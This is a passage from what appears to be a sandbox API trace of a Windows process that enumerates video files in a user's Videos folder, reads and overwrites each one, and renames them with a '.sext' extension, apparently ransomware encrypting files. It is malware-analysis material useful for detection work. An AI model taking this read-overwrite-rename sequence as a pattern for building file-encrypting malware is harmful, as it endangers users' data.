dwReserved0=0x0, dwReserved1=0x0, cFileName="r6_6ecjRu.flv", cAlternateFileName="R6_6EC~1.FLV")) returned 1 [0085.053] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ce475a0, ftCreationTime.dwHighDateTime=0x1d5d82e, ftLastAccessTime.dwLowDateTime=0xa16917c0, ftLastAccessTime.dwHighDateTime=0x1d5e4cf, ftLastWriteTime.dwLowDateTime=0xa16917c0, ftLastWriteTime.dwHighDateTime=0x1d5e4cf, nFileSizeHigh=0x0, nFileSizeLow=0x14380, dwReserved0=0x0, dwReserved1=0x0, cFileName="vCwIR.mkv", cAlternateFileName="")) returned 1 [0085.053] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x841fb3a0, ftCreationTime.dwHighDateTime=0x1d5df9c, ftLastAccessTime.dwLowDateTime=0xbd4bfc40, ftLastAccessTime.dwHighDateTime=0x1d5dc47, ftLastWriteTime.dwLowDateTime=0xbd4bfc40, ftLastWriteTime.dwHighDateTime=0x1d5dc47, nFileSizeHigh=0x0, nFileSizeLow=0x13bbc, dwReserved0=0x0, dwReserved1=0x0, cFileName="wysf8ApsC2_k.swf", cAlternateFileName="WYSF8A~1.SWF")) returned 1 [0085.054] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x841fb3a0, ftCreationTime.dwHighDateTime=0x1d5df9c, ftLastAccessTime.dwLowDateTime=0xbd4bfc40, ftLastAccessTime.dwHighDateTime=0x1d5dc47, ftLastWriteTime.dwLowDateTime=0xbd4bfc40, ftLastWriteTime.dwHighDateTime=0x1d5dc47, nFileSizeHigh=0x0, nFileSizeLow=0x13bbc, dwReserved0=0x0, dwReserved1=0x0, cFileName="wysf8ApsC2_k.swf", cAlternateFileName="WYSF8A~1.SWF")) returned 0 [0085.054] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0085.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e650) returned 1 [0085.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e610) returned 1 [0085.889] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf", nBufferLength=0x105, lpBuffer=0x12e060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf", lpFilePart=0x0) returned 0x3c [0085.889] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e540) returned 1 [0085.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bwrd8dxm pn7nk2zxyy.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2dc [0085.889] GetFileType (hFile=0x2dc) returned 0x1 [0085.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4b0) returned 1 [0085.889] GetFileType (hFile=0x2dc) returned 0x1 [0085.890] GetFileSize (in: hFile=0x2dc, lpFileSizeHigh=0x12e6d8 | out: lpFileSizeHigh=0x12e6d8*=0x0) returned 0x14e9c [0085.890] ReadFile (in: hFile=0x2dc, lpBuffer=0x12271930, nNumberOfBytesToRead=0x14e9c, lpNumberOfBytesRead=0x12e608, lpOverlapped=0x0 | out: lpBuffer=0x12271930*, lpNumberOfBytesRead=0x12e608*=0x14e9c, lpOverlapped=0x0) returned 1 [0085.893] CloseHandle (hObject=0x2dc) returned 1 [0086.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x12dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x45 [0086.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x12dff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x45 [0086.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e430) returned 1 [0086.610] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x12e510 | out: lpFileInformation=0x12e510*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x279e2c00, ftCreationTime.dwHighDateTime=0x1cd5cf6, ftLastAccessTime.dwLowDateTime=0xcf7c84e0, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0x279e2c00, ftLastWriteTime.dwHighDateTime=0x1cd5cf6, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0086.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3f0) returned 1 [0088.295] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x12dec0 | out: pfEnabled=0x12dec0) returned 0x0 [0091.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf", nBufferLength=0x105, lpBuffer=0x12e060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf", lpFilePart=0x0) returned 0x3c [0091.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e540) returned 1 [0091.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bwrd8dxm pn7nk2zxyy.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0091.639] GetFileType (hFile=0x33c) returned 0x1 [0091.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4b0) returned 1 [0091.639] GetFileType (hFile=0x33c) returned 0x1 [0091.639] WriteFile (in: hFile=0x33c, lpBuffer=0x122da2f0*, nNumberOfBytesToWrite=0x14ea0, lpNumberOfBytesWritten=0x12e668, lpOverlapped=0x0 | out: lpBuffer=0x122da2f0*, lpNumberOfBytesWritten=0x12e668*=0x14ea0, lpOverlapped=0x0) returned 1 [0091.642] CloseHandle (hObject=0x33c) returned 1 [0091.645] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf", nBufferLength=0x105, lpBuffer=0x12e200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf", lpFilePart=0x0) returned 0x3c [0091.645] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf.sext", nBufferLength=0x105, lpBuffer=0x12e200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf.sext", lpFilePart=0x0) returned 0x41 [0091.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e640) returned 1 [0091.645] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bwrd8dxm pn7nk2zxyy.swf"), fInfoLevelId=0x0, lpFileInformation=0x12e720 | out: lpFileInformation=0x12e720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52980, ftCreationTime.dwHighDateTime=0x1d5e0ad, ftLastAccessTime.dwLowDateTime=0x46c29860, ftLastAccessTime.dwHighDateTime=0x1d5dda8, ftLastWriteTime.dwLowDateTime=0x84f68a80, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x14ea0)) returned 1 [0091.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e600) returned 1 [0091.646] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bwrd8dxm pn7nk2zxyy.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\bWRd8dxM pn7NK2ZxYY.swf.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\bwrd8dxm pn7nk2zxyy.swf.sext")) returned 1 [0091.648] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv", nBufferLength=0x105, lpBuffer=0x12e060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv", lpFilePart=0x0) returned 0x34 [0091.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e540) returned 1 [0091.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gkoi5odlg3i.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x33c [0091.648] GetFileType (hFile=0x33c) returned 0x1 [0091.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4b0) returned 1 [0091.648] GetFileType (hFile=0x33c) returned 0x1 [0091.648] GetFileSize (in: hFile=0x33c, lpFileSizeHigh=0x12e6d8 | out: lpFileSizeHigh=0x12e6d8*=0x0) returned 0x5cda [0091.649] ReadFile (in: hFile=0x33c, lpBuffer=0x239c568, nNumberOfBytesToRead=0x5cda, lpNumberOfBytesRead=0x12e608, lpOverlapped=0x0 | out: lpBuffer=0x239c568*, lpNumberOfBytesRead=0x12e608*=0x5cda, lpOverlapped=0x0) returned 1 [0091.650] CloseHandle (hObject=0x33c) returned 1 [0092.050] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv", nBufferLength=0x105, lpBuffer=0x12e060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv", lpFilePart=0x0) returned 0x34 [0092.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e540) returned 1 [0092.051] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gkoi5odlg3i.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0092.052] GetFileType (hFile=0x320) returned 0x1 [0092.052] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4b0) returned 1 [0092.052] GetFileType (hFile=0x320) returned 0x1 [0092.052] WriteFile (in: hFile=0x320, lpBuffer=0x22c3208*, nNumberOfBytesToWrite=0x5ce0, lpNumberOfBytesWritten=0x12e668, lpOverlapped=0x0 | out: lpBuffer=0x22c3208*, lpNumberOfBytesWritten=0x12e668*=0x5ce0, lpOverlapped=0x0) returned 1 [0092.053] CloseHandle (hObject=0x320) returned 1 [0092.055] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv", nBufferLength=0x105, lpBuffer=0x12e200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv", lpFilePart=0x0) returned 0x34 [0092.055] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv.sext", nBufferLength=0x105, lpBuffer=0x12e200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv.sext", lpFilePart=0x0) returned 0x39 [0092.055] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e640) returned 1 [0092.055] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gkoi5odlg3i.flv"), fInfoLevelId=0x0, lpFileInformation=0x12e720 | out: lpFileInformation=0x12e720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76563770, ftCreationTime.dwHighDateTime=0x1d5dbab, ftLastAccessTime.dwLowDateTime=0x9ecf0a20, ftLastAccessTime.dwHighDateTime=0x1d5ddb7, ftLastWriteTime.dwLowDateTime=0x85346e40, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x5ce0)) returned 1 [0092.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e600) returned 1 [0092.055] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gkoi5odlg3i.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Gkoi5oDLg3I.flv.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gkoi5odlg3i.flv.sext")) returned 1 [0092.056] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4", nBufferLength=0x105, lpBuffer=0x12e060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4", lpFilePart=0x0) returned 0x2e [0092.056] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e540) returned 1 [0092.056] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ljw9t.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0092.056] GetFileType (hFile=0x320) returned 0x1 [0092.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4b0) returned 1 [0092.056] GetFileType (hFile=0x320) returned 0x1 [0092.056] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x12e6d8 | out: lpFileSizeHigh=0x12e6d8*=0x0) returned 0x84db [0092.056] ReadFile (in: hFile=0x320, lpBuffer=0x22c9348, nNumberOfBytesToRead=0x84db, lpNumberOfBytesRead=0x12e608, lpOverlapped=0x0 | out: lpBuffer=0x22c9348*, lpNumberOfBytesRead=0x12e608*=0x84db, lpOverlapped=0x0) returned 1 [0092.058] CloseHandle (hObject=0x320) returned 1 [0092.129] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4", nBufferLength=0x105, lpBuffer=0x12e060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4", lpFilePart=0x0) returned 0x2e [0092.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e540) returned 1 [0092.129] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ljw9t.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0092.130] GetFileType (hFile=0x320) returned 0x1 [0092.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4b0) returned 1 [0092.131] GetFileType (hFile=0x320) returned 0x1 [0092.131] WriteFile (in: hFile=0x320, lpBuffer=0x23de378*, nNumberOfBytesToWrite=0x84e0, lpNumberOfBytesWritten=0x12e668, lpOverlapped=0x0 | out: lpBuffer=0x23de378*, lpNumberOfBytesWritten=0x12e668*=0x84e0, lpOverlapped=0x0) returned 1 [0092.132] CloseHandle (hObject=0x320) returned 1 [0092.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4", nBufferLength=0x105, lpBuffer=0x12e200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4", lpFilePart=0x0) returned 0x2e [0092.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4.sext", nBufferLength=0x105, lpBuffer=0x12e200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4.sext", lpFilePart=0x0) returned 0x33 [0092.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e640) returned 1 [0092.134] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ljw9t.mp4"), fInfoLevelId=0x0, lpFileInformation=0x12e720 | out: lpFileInformation=0x12e720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ba93bd0, ftCreationTime.dwHighDateTime=0x1d5e27b, ftLastAccessTime.dwLowDateTime=0xe9f1cad0, ftLastAccessTime.dwHighDateTime=0x1d5e148, ftLastWriteTime.dwLowDateTime=0x85405520, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x84e0)) returned 1 [0092.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e600) returned 1 [0092.134] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ljw9t.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LJw9T.mp4.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ljw9t.mp4.sext")) returned 1 [0092.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv", nBufferLength=0x105, lpBuffer=0x12e060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv", lpFilePart=0x0) returned 0x32 [0092.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e540) returned 1 [0092.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\r6_6ecjru.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0092.135] GetFileType (hFile=0x320) returned 0x1 [0092.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4b0) returned 1 [0092.135] GetFileType (hFile=0x320) returned 0x1 [0092.135] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x12e6d8 | out: lpFileSizeHigh=0x12e6d8*=0x0) returned 0x4e47 [0092.135] ReadFile (in: hFile=0x320, lpBuffer=0x23e6c80, nNumberOfBytesToRead=0x4e47, lpNumberOfBytesRead=0x12e608, lpOverlapped=0x0 | out: lpBuffer=0x23e6c80*, lpNumberOfBytesRead=0x12e608*=0x4e47, lpOverlapped=0x0) returned 1 [0092.136] CloseHandle (hObject=0x320) returned 1 [0092.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv", nBufferLength=0x105, lpBuffer=0x12e060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv", lpFilePart=0x0) returned 0x32 [0092.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e540) returned 1 [0092.621] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\r6_6ecjru.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0092.623] GetFileType (hFile=0x320) returned 0x1 [0092.623] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4b0) returned 1 [0092.623] GetFileType (hFile=0x320) returned 0x1 [0092.623] WriteFile (in: hFile=0x320, lpBuffer=0x22fb738*, nNumberOfBytesToWrite=0x4e50, lpNumberOfBytesWritten=0x12e668, lpOverlapped=0x0 | out: lpBuffer=0x22fb738*, lpNumberOfBytesWritten=0x12e668*=0x4e50, lpOverlapped=0x0) returned 1 [0092.624] CloseHandle (hObject=0x320) returned 1 [0092.631] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv", nBufferLength=0x105, lpBuffer=0x12e200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv", lpFilePart=0x0) returned 0x32 [0092.631] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv.sext", nBufferLength=0x105, lpBuffer=0x12e200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv.sext", lpFilePart=0x0) returned 0x37 [0092.631] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e640) returned 1 [0092.631] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\r6_6ecjru.flv"), fInfoLevelId=0x0, lpFileInformation=0x12e720 | out: lpFileInformation=0x12e720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6afdd8f0, ftCreationTime.dwHighDateTime=0x1d5d7d3, ftLastAccessTime.dwLowDateTime=0x29e8d860, ftLastAccessTime.dwHighDateTime=0x1d5de3b, ftLastWriteTime.dwLowDateTime=0x858c8120, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x4e50)) returned 1 [0092.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e600) returned 1 [0092.631] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\r6_6ecjru.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\r6_6ecjRu.flv.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\r6_6ecjru.flv.sext")) returned 1 [0092.632] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv", nBufferLength=0x105, lpBuffer=0x12e060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv", lpFilePart=0x0) returned 0x2e [0092.632] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e540) returned 1 [0092.632] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vcwir.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0092.632] GetFileType (hFile=0x320) returned 0x1 [0092.632] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4b0) returned 1 [0092.632] GetFileType (hFile=0x320) returned 0x1 [0092.632] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x12e6d8 | out: lpFileSizeHigh=0x12e6d8*=0x0) returned 0x14380 [0092.632] ReadFile (in: hFile=0x320, lpBuffer=0x23009c8, nNumberOfBytesToRead=0x14380, lpNumberOfBytesRead=0x12e608, lpOverlapped=0x0 | out: lpBuffer=0x23009c8*, lpNumberOfBytesRead=0x12e608*=0x14380, lpOverlapped=0x0) returned 1 [0092.634] CloseHandle (hObject=0x320) returned 1 [0092.709] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv", nBufferLength=0x105, lpBuffer=0x12e060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv", lpFilePart=0x0) returned 0x2e [0092.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e540) returned 1 [0092.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vcwir.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0092.711] GetFileType (hFile=0x320) returned 0x1 [0092.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4b0) returned 1 [0092.711] GetFileType (hFile=0x320) returned 0x1 [0092.711] WriteFile (in: hFile=0x320, lpBuffer=0x2428c48*, nNumberOfBytesToWrite=0x14390, lpNumberOfBytesWritten=0x12e668, lpOverlapped=0x0 | out: lpBuffer=0x2428c48*, lpNumberOfBytesWritten=0x12e668*=0x14390, lpOverlapped=0x0) returned 1 [0092.713] CloseHandle (hObject=0x320) returned 1 [0092.715] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv", nBufferLength=0x105, lpBuffer=0x12e200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv", lpFilePart=0x0) returned 0x2e [0092.716] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv.sext", nBufferLength=0x105, lpBuffer=0x12e200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv.sext", lpFilePart=0x0) returned 0x33 [0092.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e640) returned 1 [0092.716] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vcwir.mkv"), fInfoLevelId=0x0, lpFileInformation=0x12e720 | out: lpFileInformation=0x12e720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ce475a0, ftCreationTime.dwHighDateTime=0x1d5d82e, ftLastAccessTime.dwLowDateTime=0xa16917c0, ftLastAccessTime.dwHighDateTime=0x1d5e4cf, ftLastWriteTime.dwLowDateTime=0x859ac960, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x14390)) returned 1 [0092.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e600) returned 1 [0092.716] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vcwir.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\vCwIR.mkv.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\vcwir.mkv.sext")) returned 1 